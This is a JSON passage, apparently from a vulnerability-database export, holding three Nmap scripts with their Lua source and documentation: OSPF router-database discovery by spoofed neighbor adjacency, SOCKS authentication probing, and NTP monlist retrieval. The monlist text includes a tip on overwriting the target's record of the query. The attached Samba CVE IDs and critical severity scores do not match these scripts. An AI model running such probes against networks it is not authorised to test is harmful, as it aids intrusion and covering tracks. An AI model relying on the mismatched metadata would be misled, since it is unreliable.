{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-03-14T00:15:22", "type": "nmap", "title": "broadcast-ospf2-discover NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-10-09T17:06:03", "id": "NMAP:BROADCAST-OSPF2-DISCOVER.NSE", "href": "https://nmap.org/nsedoc/scripts/broadcast-ospf2-discover.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal ospf = require \"ospf\"\nlocal packet = require \"packet\"\nlocal stdnse = require \"stdnse\"\nlocal target = require \"target\"\nlocal os = require \"os\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\nlocal have_ssl, openssl = pcall(require,'openssl')\n\ndescription = [[\nDiscover IPv4 networks using Open Shortest Path First version 2(OSPFv2) protocol.\n\nThe script works by listening for OSPF Hello packets from the 224.0.0.5\nmulticast address. The script then replies and attempts to create a neighbor\nrelationship, in order to discover network database.\n\nIf no interface was provided as a script argument or through the -e option,\nthe script will fail unless a single interface is present on the system.\n]]\n\n---\n-- @usage\n-- nmap --script=broadcast-ospf2-discover\n-- nmap --script=broadcast-ospf2-discover -e wlan0\n--\n-- @args broadcast-ospf2-discover.md5_key MD5 digest key to use if message digest\n-- authentication is disclosed.\n--\n-- @args broadcast-ospf2-discover.router_id Router ID to use. Defaults to 0.0.0.1\n--\n-- @args broadcast-ospf2-discover.timeout Time in seconds that the script waits for\n-- hello from other routers. Defaults to 10 seconds, matching OSPFv2 default\n-- value for hello interval.\n--\n-- @args broadcast-ospf2-discover.interface Interface to send on (overrides -e). Mandatory\n-- if not using -e and multiple interfaces are present.\n--\n-- @output\n-- Pre-scan script results:\n-- | broadcast-ospf2-discover:\n-- | Area ID: 0.0.0.0\n-- | External Routes\n-- | 192.168.24.0/24\n-- |_ Use the newtargets script-arg to add the results as targets\n--\n\nauthor = \"Emiliano Ticci\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"broadcast\", \"discovery\", \"safe\"}\n\nprerule = function()\n if nmap.address_family() ~= \"inet\" then\n stdnse.print_verbose(\"is IPv4 only.\")\n return false\n end\n if not nmap.is_privileged() then\n stdnse.print_verbose(\"not running for lack of privileges.\")\n return false\n end\n return true\nend\n\n-- Script constants\nOSPF_ALL_ROUTERS = \"224.0.0.5\"\nOSPF_MSG_HELLO = 0x01\nOSPF_MSG_DBDESC = 0x02\nOSPF_MSG_LSREQ = 0x03\nOSPF_MSG_LSUPD = 0x04\nlocal md5_key, router_id\n\n-- Convenience functions\nlocal function fail(err) return stdnse.format_output(false, err) end\n\n-- Print OSPFv2 LSA Header packet details to debug output.\n-- @param hello OSPFv2 LSA Header packet\nlocal ospfDumpLSAHeader = function(lsa_h)\n if 2 > nmap.debugging() then\n return\n end\n stdnse.print_debug(2, \"| LS Age: %s\", lsa_h.age)\n stdnse.print_debug(2, \"| Options: %s\", lsa_h.options)\n stdnse.print_debug(2, \"| LS Type: %s\", lsa_h.type)\n stdnse.print_debug(2, \"| Link State ID: %s\", lsa_h.id)\n stdnse.print_debug(2, \"| Advertising Router: %s\", lsa_h.adv_router)\n stdnse.print_debug(2, \"| Sequence: 0x%s\", lsa_h.sequence)\n stdnse.print_debug(2, \"| Checksum: 0x%s\", lsa_h.checksum)\n stdnse.print_debug(2, \"| Length: %s\", lsa_h.length)\nend\n\n-- Print OSPFv2 Database Description packet details to debug output.\n-- @param hello OSPFv2 Database Description packet\nlocal ospfDumpDBDesc = function(db_desc)\n if 2 > nmap.debugging() then\n return\n end\n stdnse.print_debug(2, \"| MTU: %s\", db_desc.mtu)\n stdnse.print_debug(2, \"| Options: %s\", db_desc.options)\n stdnse.print_debug(2, \"| Init: %s\", db_desc.init)\n stdnse.print_debug(2, \"| More: %s\", db_desc.more)\n stdnse.print_debug(2, \"| Master: %s\", db_desc.master)\n stdnse.print_debug(2, \"| Sequence: %s\", db_desc.sequence)\n if #db_desc.lsa_headers > 0 then\n stdnse.print_debug(2, \"| LSA Headers:\")\n for i, lsa_h in ipairs(db_desc.lsa_headers) do\n ospfDumpLSAHeader(lsa_h)\n if i < #db_desc.lsa_headers then\n stdnse.print_debug(2, \"|\")\n end\n end\n end\nend\n\n-- Print OSPFv2 Hello packet details to debug output.\n-- @param hello OSPFv2 Hello packet\nlocal ospfDumpHello = function(hello)\n if 2 > nmap.debugging() then\n return\n end\n stdnse.print_debug(2, \"| Router ID: %s\", hello.header.router_id)\n stdnse.print_debug(2, \"| Area ID: %s\", ipOps.fromdword(hello.header.area_id))\n stdnse.print_debug(2, \"| Checksum: %s\", hello.header.chksum)\n stdnse.print_debug(2, \"| Auth Type: %s\", hello.header.auth_type)\n if hello.header.auth_type == 0x01 then\n stdnse.print_debug(2, \"| Auth Password: %s\", hello.header.auth_data.password)\n elseif hello.header.auth_type == 0x02 then\n stdnse.print_debug(2, \"| Auth Crypt Key ID: %s\", hello.header.auth_data.keyid)\n stdnse.print_debug(2, \"| Auth Data Length: %s\", hello.header.auth_data.length)\n stdnse.print_debug(2, \"| Auth Crypt Seq: %s\", hello.header.auth_data.seq)\n end\n stdnse.print_debug(2, \"| Netmask: %s\", hello.netmask)\n stdnse.print_debug(2, \"| Hello interval: %s\", hello.interval)\n stdnse.print_debug(2, \"| Options: %s\", hello.options)\n stdnse.print_debug(2, \"| Priority: %s\", hello.prio)\n stdnse.print_debug(2, \"| Dead interval: %s\", hello.router_dead_interval)\n stdnse.print_debug(2, \"| Designated Router: %s\", hello.DR)\n stdnse.print_debug(2, \"| Backup Router: %s\", hello.BDR)\n stdnse.print_debug(2, \"| Neighbors: %s\", table.concat(hello.neighbors, \",\"))\nend\n\n-- Print OSPFv2 LS Request packet details to debug output.\n-- @param ls_req OSPFv2 LS Request packet\nlocal ospfDumpLSRequest = function(ls_req)\n if 2 > nmap.debugging() then\n return\n end\n for i, req in ipairs(ls_req.ls_requests) do\n stdnse.print_debug(2, \"| LS Type: %s\", req.type)\n stdnse.print_debug(2, \"| Link State ID: %s\", req.id)\n stdnse.print_debug(2, \"| Avertising Router: %s\", req.adv_router)\n if i < #ls_req.ls_requests then\n stdnse.print_debug(2, \"|\")\n end\n end\nend\n\n-- Print OSPFv2 LS Update packet details to debug output.\n-- @param ls_upd OSPFv2 LS Update packet\nlocal ospfDumpLSUpdate = function(ls_upd)\n stdnse.print_debug(2, \"| Number of LSAs: %s\", ls_upd.num_lsas)\n for i, lsa in ipairs(ls_upd.lsas) do\n -- Only Type 1 (Router-LSA) and Type 5 (AS-External-LSA) are supported at the moment\n ospfDumpLSAHeader(lsa.header)\n if lsa.header.type == 1 then\n stdnse.print_debug(2, \"| Flags: %s\", lsa.flags)\n stdnse.print_debug(2, \"| Number of links: %s\", lsa.num_links)\n for j, link in ipairs(lsa.links) do\n stdnse.print_debug(2, \"| Link ID: %s\", link.id)\n stdnse.print_debug(2, \"| Link Data: %s\", link.data)\n stdnse.print_debug(2, \"| Link Type: %s\", link.type)\n stdnse.print_debug(2, \"| Number of Metrics: %s\", link.num_metrics)\n stdnse.print_debug(2, \"| 0 Metric: %s\", link.metric)\n if j < #lsa.links then\n stdnse.print_debug(2, \"|\")\n end\n end\n if i < #ls_upd.lsas then\n stdnse.print_debug(2, \"|\")\n end\n elseif lsa.header.type == 5 then\n stdnse.print_debug(2, \"| Netmask: %s\", lsa.netmask)\n stdnse.print_debug(2, \"| External Type: %s\", lsa.ext_type)\n stdnse.print_debug(2, \"| Metric: %s\", lsa.metric)\n stdnse.print_debug(2, \"| Forwarding Address: %s\", lsa.fw_address)\n stdnse.print_debug(2, \"| External Route Tag: %s\", lsa.ext_tag)\n end\n end\nend\n\n-- Send OSPFv2 packet to specified destination.\n-- @param interface Source interface to use\n-- @param ip_dst Destination IP address\n-- @param mac_dst Destination MAC address\n-- @param ospf_packet Raw OSPF packet\nlocal ospfSend = function(interface, ip_dst, mac_dst, ospf_packet)\n local dnet = nmap.new_dnet()\n local probe = packet.Frame:new()\n\n probe.mac_src = interface.mac\n probe.mac_dst = mac_dst\n probe.ip_bin_src = ipOps.ip_to_str(interface.address)\n probe.ip_bin_dst = ipOps.ip_to_str(ip_dst)\n probe.l3_packet = ospf_packet\n probe.ip_dsf = 0xc0\n probe.ip_p = 89\n probe.ip_ttl = 1\n\n probe:build_ip_packet()\n probe:build_ether_frame()\n\n dnet:ethernet_open(interface.device)\n dnet:ethernet_send(probe.frame_buf)\n dnet:ethernet_close()\nend\n\n-- Prepare OSPFv2 packet header for reply.\n-- @param packet_in Source packet\n-- @param packet_out Destination packet\nlocal ospfSetHeader = function(packet_in, packet_out)\n packet_out.header:setRouterId(router_id)\n packet_out.header:setAreaID(packet_in.header.area_id)\n if packet_in.header.auth_type == 0x01 then\n packet_out.header.auth_type = 0x01\n packet_out.header.auth_data.password = packet_in.header.auth_data.password\n elseif packet_in.header.auth_type == 0x02 then\n packet_out.header.auth_type = 0x02\n packet_out.header.auth_data.key = md5_key\n packet_out.header.auth_data.keyid = packet_in.header.auth_data.keyid\n packet_out.header.auth_data.length = 16\n packet_out.header.auth_data.seq = os.time()\n end\n\n return packet_out\nend\n\n-- Reply to OSPFv2 Database Description with an LS Request.\n-- @param interface Source interface\n-- @param mac_dst Destination MAC address\n-- @param db_desc_in OSPFv2 Database Description packet to reply for\nlocal ospfSendLSRequest = function(interface, mac_dst, db_desc_in)\n local ls_req_out = ospf.OSPF.LSRequest:new()\n ls_req_out = ospfSetHeader(db_desc_in, ls_req_out)\n\n for i, lsa_h in ipairs(db_desc_in.lsa_headers) do\n ls_req_out:addRequest(lsa_h.type, lsa_h.id, lsa_h.adv_router)\n end\n\n stdnse.print_debug(2, \"Crafted OSPFv2 LS Request packet with the following parameters:\")\n ospfDumpLSRequest(ls_req_out)\n ospfSend(interface, db_desc_in.header.router_id, mac_dst, tostring(ls_req_out))\nend\n\n-- Reply to given OSPFv2 Database Description packet.\n-- @param interface Source interface\n-- @param mac_dst Destination MAC address\n-- @param db_desc_in OSPFv2 Database Description packet to reply for\nlocal ospfReplyDBDesc = function(interface, mac_dst, db_desc_in)\n local reply = false\n local db_desc_out = ospf.OSPF.DBDescription:new()\n db_desc_out = ospfSetHeader(db_desc_in, db_desc_out)\n\n if db_desc_in.init == true then\n db_desc_out.init = false\n db_desc_out.more = db_desc_in.more\n db_desc_out.master = false\n db_desc_out.sequence = db_desc_in.sequence\n reply = true\n elseif #db_desc_in.lsa_headers > 0 then\n ospfSendLSRequest(interface, mac_dst, db_desc_in)\n return true\n end\n\n if reply then\n stdnse.print_debug(2, \"Crafted OSPFv2 Database Description packet with the following parameters:\")\n ospfDumpDBDesc(db_desc_out)\n ospfSend(interface, db_desc_in.header.router_id, mac_dst, tostring(db_desc_out))\n end\n\n return reply\nend\n\n-- Reply to given OSPFv2 Hello packet sending another Hello to\n-- \"All OSPF Routers\" multicast address (224.0.0.5).\n-- @param interface Source interface\n-- @param hello_in OSPFv2 Hello packet to reply for\nlocal ospfReplyHello = function(interface, hello_in)\n local hello_out = ospf.OSPF.Hello:new()\n hello_out = ospfSetHeader(hello_in, hello_out)\n hello_out.interval = hello_in.interval\n hello_out.router_dead_interval = hello_in.router_dead_interval\n hello_out:setDesignatedRouter(hello_in.header.router_id)\n hello_out:setNetmask(hello_in.netmask)\n hello_out:addNeighbor(hello_in.header.router_id)\n\n stdnse.print_debug(2, \"Crafted OSPFv2 Hello packet with the following parameters:\")\n ospfDumpHello(hello_out)\n\n ospfSend(interface, OSPF_ALL_ROUTERS, \"\\x01\\x00\\x5e\\x00\\x00\\x05\", tostring(hello_out))\nend\n\n-- Listen for OSPF packets on a specified interface.\n-- @param interface Interface to use\n-- @param timeout Amount of time to listen in seconds\nlocal ospfListen = function(interface, timeout)\n local status, l2_data, l3_data, ospf_raw, _\n local start = nmap.clock_ms()\n\n stdnse.print_debug(\"Start listening on interface %s...\", interface.shortname)\n local listener = nmap.new_socket()\n listener:set_timeout(1000)\n listener:pcap_open(interface.device, 1500, true, \"ip proto 89 and not (ip src host \" .. interface.address .. \")\")\n while (nmap.clock_ms() - start) < (timeout * 1000) do\n status, _, l2_data, l3_data = listener:pcap_receive()\n if status then\n stdnse.print_debug(2, \"Packet received on interface %s.\", interface.shortname)\n local p = packet.Packet:new(l3_data, #l3_data)\n local ospf_raw = string.sub(l3_data, p.ip_hl * 4 + 1)\n if ospf_raw:byte(1) == 0x02 and ospf_raw:byte(2) == OSPF_MSG_HELLO then\n stdnse.print_debug(2, \"OSPFv2 Hello packet detected.\")\n\n local ospf_hello = ospf.OSPF.Hello.parse(ospf_raw)\n stdnse.print_debug(2, \"Captured OSPFv2 Hello packet with the following parameters:\")\n ospfDumpHello(ospf_hello)\n\n -- Additional checks required for message digest authentication\n if ospf_hello.header.auth_type == 0x02 then\n if not md5_key then\n return fail(\"Argument md5_key must be present when message digest authentication is disclosed.\")\n elseif not have_ssl then\n return fail(\"Cannot handle message digest authentication unless openssl is compiled in.\")\n end\n end\n\n ospfReplyHello(interface, ospf_hello)\n start = nmap.clock_ms()\n elseif ospf_raw:byte(1) == 0x02 and ospf_raw:byte(2) == OSPF_MSG_DBDESC then\n stdnse.print_debug(2, \"OSPFv2 Database Description packet detected.\")\n\n local ospf_db_desc = ospf.OSPF.DBDescription.parse(ospf_raw)\n stdnse.print_debug(2, \"Captured OSPFv2 Database Description packet with the following parameters:\")\n ospfDumpDBDesc(ospf_db_desc)\n\n if not ospfReplyDBDesc(interface, string.sub(l2_data, 7, 12), ospf_db_desc) then\n return\n end\n elseif ospf_raw:byte(1) == 0x02 and ospf_raw:byte(2) == OSPF_MSG_LSUPD then\n stdnse.print_debug(2, \"OSPFv2 LS Update packet detected.\")\n\n local ospf_ls_upd = ospf.OSPF.LSUpdate.parse(ospf_raw)\n stdnse.print_debug(2, \"Captured OSPFv2 LS Update packet with the following parameters:\")\n ospfDumpLSUpdate(ospf_ls_upd)\n\n local targets = {}\n for i, lsa in ipairs(ospf_ls_upd.lsas) do\n -- Only Type 1 (Router-LSA) and Type 5 (AS-External-LSA) are supported at the moment\n if lsa.header.type == 1 then\n for j, link in ipairs(lsa.links) do\n if link.type == 3 then\n local target = link.id .. ipOps.subnet_to_cidr(link.data)\n targets[target] = 1\n end\n end\n elseif lsa.header.type == 5 then\n local target = lsa.header.id .. ipOps.subnet_to_cidr(lsa.netmask)\n targets[target] = 1\n end\n end\n local output = stdnse.output_table()\n if next(targets) then\n local out_links = {}\n output[\"Area ID\"] = ipOps.fromdword(ospf_ls_upd.header.area_id)\n output[\"External Routes\"] = out_links\n for t, _ in pairs(targets) do\n table.insert(out_links, t)\n if target.ALLOW_NEW_TARGETS then\n target.add(t)\n end\n end\n if not target.ALLOW_NEW_TARGETS then\n stdnse.verbose(\"Use the newtargets script-arg to add the results as targets\")\n end\n end\n return output\n end\n end\n end\n listener:pcap_close()\nend\n\naction = function()\n -- Get script arguments\n md5_key = stdnse.get_script_args(SCRIPT_NAME .. \".md5_key\") or false\n router_id = stdnse.get_script_args(SCRIPT_NAME .. \".router_id\") or \"0.0.0.1\"\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\")) or 10\n local interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n stdnse.print_debug(\"Value for router ID argument: %s.\", router_id)\n stdnse.print_debug(\"Value for timeout argument: %s.\", timeout)\n\n -- Determine interface to use\n interface = interface or nmap.get_interface()\n if interface then\n interface = nmap.get_interface_info(interface)\n if not interface then\n return fail((\"Failed to retrieve %s interface information.\"):format(interface))\n end\n stdnse.print_debug(\"Will use %s interface.\", interface.shortname)\n else\n local interface_list = nmap.list_interfaces()\n local interface_good = {}\n for _, os_interface in ipairs(interface_list) do\n if os_interface.address and os_interface.link == \"ethernet\" and\n os_interface.address:match(\"%d+%.%d+%.%d+%.%d+\") then\n\n stdnse.print_debug(2, \"Found usable interface: %s.\", os_interface.shortname)\n table.insert(interface_good, os_interface)\n end\n end\n if #interface_good == 1 then\n interface = interface_good[1]\n stdnse.print_debug(\"Will use %s interface.\", interface.shortname)\n elseif #interface_good == 0 then\n return fail(\"Source interface not found.\")\n else\n return fail(\"Ambiguous source interface, please specify it with -e or interface parameter.\")\n end\n end\n\n return ospfListen(interface, timeout)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:21", "description": "Determines the supported authentication mechanisms of a remote SOCKS proxy server. Starting with SOCKS version 5 socks servers may support authentication. The script checks for the following authentication types: 0 - No authentication 1 - GSSAPI 2 - Username and password\n\n## Example Usage \n \n \n nmap -p 1080 <ip> --script socks-auth-info\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 1080/tcp open socks\n | socks-auth-info:\n | No authentication\n |_ Username and password\n \n\n## Requires \n\n * [shortport](<../lib/shortport.html>)\n * [socks](<../lib/socks.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-01-02T11:34:27", "type": "nmap", "title": "socks-auth-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2015-11-05T20:41:05", "id": "NMAP:SOCKS-AUTH-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/socks-auth-info.html", "sourceData": "local shortport = require \"shortport\"\nlocal socks = require \"socks\"\nlocal table = require \"table\"\n\ndescription = [[\nDetermines the supported authentication mechanisms of a remote SOCKS\nproxy server. Starting with SOCKS version 5 socks servers may support\nauthentication. The script checks for the following authentication\ntypes:\n 0 - No authentication\n 1 - GSSAPI\n 2 - Username and password\n]]\n\n---\n-- @usage\n-- nmap -p 1080 <ip> --script socks-auth-info\n--\n-- @output\n-- PORT STATE SERVICE\n-- 1080/tcp open socks\n-- | socks-auth-info:\n-- | No authentication\n-- |_ Username and password\n--\n-- @xmloutput\n-- <table>\n-- <elem key=\"method\">0</elem>\n-- <elem key=\"name\">No authentication</elem>\n-- </table>\n-- <table>\n-- <elem key=\"method\">2</elem>\n-- <elem key=\"name\">Username and password</elem>\n-- </table>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\", \"default\"}\n\nportrule = shortport.port_or_service({1080, 9050}, {\"socks\", \"socks5\", \"tor-socks\"})\n\naction = function(host, port)\n\n local helper = socks.Helper:new(host, port)\n local auth_methods = {}\n\n -- iterate over all authentication methods as the server only responds with\n -- a single supported one if we send a list.\n local mt = { __tostring = function(t) return t.name end }\n for _, method in pairs(socks.AuthMethod) do\n local status, response = helper:connect( method )\n if ( status ) then\n local out = {\n method = response.method,\n name = helper:authNameByNumber(response.method)\n }\n setmetatable(out, mt)\n table.insert(auth_methods, out)\n end\n end\n\n helper:close()\n if ( 0 == #auth_methods ) then return end\n return auth_methods\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:39:36", "description": "Obtains and prints an NTP server's monitor data. \n\nMonitor data is a list of the most recently used (MRU) having NTP associations with the target. Each record contains information about the most recent NTP packet sent by a host to the target including the source and destination addresses and the NTP version and mode of the packet. With this information it is possible to classify associated hosts as Servers, Peers, and Clients. \n\nA Peers command is also sent to the target and the peers list in the response allows differentiation between configured Mode 1 Peers and clients which act like Peers (such as the Windows W32Time service). \n\nAssociated hosts are further classified as either public or private. Private hosts are those having IP addresses which are not routable on the public Internet and thus can help to form a picture about the topology of the private network on which the target resides. \n\nOther information revealed by the monlist and peers commands are the host with which the target clock is synchronized and hosts which send Control Mode (6) and Private Mode (7) commands to the target and which may be used by admins for the NTP service. \n\nIt should be noted that the very nature of the NTP monitor data means that the Mode 7 commands sent by this script are recorded by the target (and will often appear in these results). Since the monitor data is a MRU list, it is probable that you can overwrite the record of the Mode 7 command by sending an innocuous looking Client Mode request. This can be achieved easily using Nmap: `nmap -sU -pU:123 -Pn -n --max-retries=0 <target>`\n\nNotes: \n\n * The monitor list in response to the monlist command is limited to 600 associations. \n * The monitor capability may not be enabled on the target in which case you may receive an error number 4 (No Data Available). \n * There may be a restriction on who can perform Mode 7 commands (e.g. \"restrict noquery\" in `ntp.conf`) in which case you may not receive a reply. \n * This script does not handle authenticating and targets expecting auth info may respond with error number 3 (Format Error).\n\n## Example Usage \n \n \n nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 123/udp open ntp udp-response\n | ntp-monlist:\n | Target is synchronised with 127.127.38.0 (reference clock)\n | Alternative Target Interfaces:\n | 10.17.4.20\n | Private Servers (0)\n | Public Servers (0)\n | Private Peers (0)\n | Public Peers (0)\n | Private Clients (2)\n | 10.20.8.69 169.254.138.63\n | Public Clients (597)\n | 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152\n | ...\n | 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118\n | 68.56.205.98\n | 2001:1400:0:0:0:0:0:1 2001:16d8:dd00:38:0:0:0:2\n | 2002:db5a:bccd:1:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682\n | Other Associations (1)\n |_ 127.0.0.1 seen 1949869 times. last tx was unicast v2 mode 7\n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [math](<>)\n * [nmap](<../lib/nmap.html>)\n * [packet](<../lib/packet.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-06-03T12:14:15", "type": "nmap", "title": "ntp-monlist NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-05T21:57:41", "id": "NMAP:NTP-MONLIST.NSE", "href": "https://nmap.org/nsedoc/scripts/ntp-monlist.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal math = require \"math\"\nlocal nmap = require \"nmap\"\nlocal packet = require \"packet\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\n\nauthor = \"jah\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"intrusive\"}\ndescription = [[\nObtains and prints an NTP server's monitor data.\n\nMonitor data is a list of the most recently used (MRU) having NTP associations\nwith the target. Each record contains information about the most recent NTP\npacket sent by a host to the target including the source and destination\naddresses and the NTP version and mode of the packet. With this information it\nis possible to classify associated hosts as Servers, Peers, and Clients.\n\nA Peers command is also sent to the target and the peers list in the response\nallows differentiation between configured Mode 1 Peers and clients which act\nlike Peers (such as the Windows W32Time service).\n\nAssociated hosts are further classified as either public or private.\nPrivate hosts are those\nhaving IP addresses which are not routable on the public Internet and thus can\nhelp to form a picture about the topology of the private network on which the\ntarget resides.\n\nOther information revealed by the monlist and peers commands are the host with\nwhich the target clock is synchronized and hosts which send Control Mode (6)\nand Private Mode (7) commands to the target and which may be used by admins for\nthe NTP service.\n\nIt should be noted that the very nature of the NTP monitor data means that the\nMode 7 commands sent by this script are recorded by the target (and will often\nappear in these results). Since the monitor data is a MRU list, it is probable\nthat you can overwrite the record of the Mode 7 command by sending an innocuous\nlooking Client Mode request. This can be achieved easily using Nmap:\n<code>nmap -sU -pU:123 -Pn -n --max-retries=0 <target></code>\n\nNotes:\n* The monitor list in response to the monlist command is limited to 600 associations.\n* The monitor capability may not be enabled on the target in which case you may receive an error number 4 (No Data Available).\n* There may be a restriction on who can perform Mode 7 commands (e.g. \"restrict noquery\" in <code>ntp.conf</code>) in which case you may not receive a reply.\n* This script does not handle authenticating and targets expecting auth info may respond with error number 3 (Format Error).\n]]\n\n---\n-- @usage\n-- nmap -sU -pU:123 -Pn -n --script=ntp-monlist <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 123/udp open ntp udp-response\n-- | ntp-monlist:\n-- | Target is synchronised with 127.127.38.0 (reference clock)\n-- | Alternative Target Interfaces:\n-- | 10.17.4.20\n-- | Private Servers (0)\n-- | Public Servers (0)\n-- | Private Peers (0)\n-- | Public Peers (0)\n-- | Private Clients (2)\n-- | 10.20.8.69 169.254.138.63\n-- | Public Clients (597)\n-- | 4.79.17.248 68.70.72.194 74.247.37.194 99.190.119.152\n-- | ...\n-- | 12.10.160.20 68.80.36.133 75.1.39.42 108.7.58.118\n-- | 68.56.205.98\n-- | 2001:1400:0:0:0:0:0:1 2001:16d8:dd00:38:0:0:0:2\n-- | 2002:db5a:bccd:1:21d:e0ff:feb7:b96f 2002:b6ef:81c4:0:0:1145:59c5:3682\n-- | Other Associations (1)\n-- |_ 127.0.0.1 seen 1949869 times. last tx was unicast v2 mode 7\n\n-- This script uses the NTP sequence numbers and the 'more' bit found in\n-- response packets in order to determine when to stop the reception loop. It\n-- would be possible for a malicious target to tie-up this script by sending\n-- a continuous stream of UDP datagrams.\n-- Therefore MAXIMUM_EVIL has been defined to limit the number of malformed or\n-- duplicate packets that will be processed before a target is rejected and\n-- MAX_RECORDS simply limits the storage of valid looking NTP data to a sane\n-- level.\nlocal MAXIMUM_EVIL = 25\nlocal MAX_RECORDS = 1200\n\nlocal TIMEOUT = 5000 -- ms\n\n\n---\n-- ntp-monlist will run against the ntp service which only runs on UDP 123\n--\nportrule = shortport.port_or_service(123, 'ntp', {'udp'})\n\n---\n-- Send an NTPv2 Mode 7 'monlist' command to the target, receive any responses\n-- and parse records from those responses. If the target responds favourably\n-- then send a 'peers' command and parse the responses. Finally, categorise the\n-- discovered NTP associations (hosts) and output the interpreted results.\n--\naction = function(host, port)\n\n -- Define the request code and implementation numbers of the NTP request to\n -- send to the target.\n local REQ_MON_GETLIST_1 = 42\n local REQ_PEER_LIST = 0\n local IMPL_XNTPD = 3\n\n -- parsed records will be stored in this table.\n local records = {['peerlist'] = {}}\n\n -- send monlist command and fill the records table with the responses.\n local inum, rcode = IMPL_XNTPD, REQ_MON_GETLIST_1\n local sock = doquery(nil, host, port, inum, rcode, records)\n\n -- end here if there are zero records.\n if #records == 0 then\n if sock then sock:close() end\n return nil\n end\n\n -- send peers command and add the responses to records.peerlist.\n rcode = REQ_PEER_LIST\n sock = doquery(sock, host, port, inum, rcode, records)\n if sock then sock:close() end\n\n -- now we can interpret the collected records.\n local interpreted = interpret(records, host.ip)\n\n -- output.\n return summary(interpreted)\n\nend\n\n\n---\n-- Sends NTPv2 Mode 7 requests to the target, receives any responses and parses\n-- records from those responses.\n--\n-- @param sock Socket object which must be supplied in a connected state.\n-- nil may be supplied instead and a socket will be created.\n-- @param host Nmap host table for the target.\n-- @param port Nmap port table for the target.\n-- @param inum NTP implementation number (i.e. 0, 2 or 3).\n-- @param rcode NTP Mode 7 request code (e.g. 42 for 'monlist').\n-- @param records Table in which to store records parsed from responses.\n-- @return sock Socket object connected to 